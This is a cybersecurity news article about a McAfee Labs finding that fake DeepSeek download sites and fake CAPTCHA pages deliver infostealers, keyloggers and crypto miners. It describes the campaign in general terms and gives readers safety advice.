Fake DeepSeek installers are infecting your device with dangerous malware

(Image credit: Getty Images)

McAfee's researchers find a "cocktail" of malware hiding behind fake DeepSeek apps
The campaign preys on people searching for the generative AI tool
Infostealers, crypto miners, and more, are being deployed this way

The hype around DeepSeek is the next big thing cybercriminals are exploiting in their hacking campaigns, researchers from McAfee Labs are saying.

The team has outlined how they saw cybercriminals setting up various websites, offering different versions of DeepSeek for download. Victims would reach these websites through search engines, meaning that some SEO poisoning was involved in the campaign, as well.

When they reach the websites and download the software, the victims are infected with a “cocktail of malware”, ranging from keyloggers and password stealers, to coin miners. These malware variants can steal sensitive information (including banking credentials and cryptocurrency wallet information), and can force the infected computer to mine cryptocurrency, rendering it useless for pretty much anything else.

Fake CAPTCHA

While on some websites, the victims are invited to download a DeepSeek app or program, on others - the devil is in the CAPTCHA.

In some cases observed by McAfee, victims would visit a website with a CAPTCHA that can be “solved” by copying and pasting a command into the Run program on Windows. This command just downloads and runs a malware dropper.

To stay safe, you should stay vigilant at all times. Instead of “googling” for something, visit the website directly, and if you don’t know the address, scrutinize every link returned by the search engine.

Furthermore, a real CAPTCHA will never ask you to paste a command into the Run program.

Hackers are known for tapping into current trends to distribute malware. Similar campaigns were observed when Chat-GPT was first released, both for Windows and Android.

Major events, such as Black Friday and Cyber Monday, the Olympic Games, World Cup, and others, have all been abused in the past. The Covid-19 breakout, Russo-Ukrainian war, and the US presidential elections, all served as platforms for information theft, malware distribution, and wire fraud.

Hackers claim Orange attack, threaten to leak 1TB of data
We've rounded up the best password managers
Take a look at our guide to the best authenticator app

TOPICS

Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.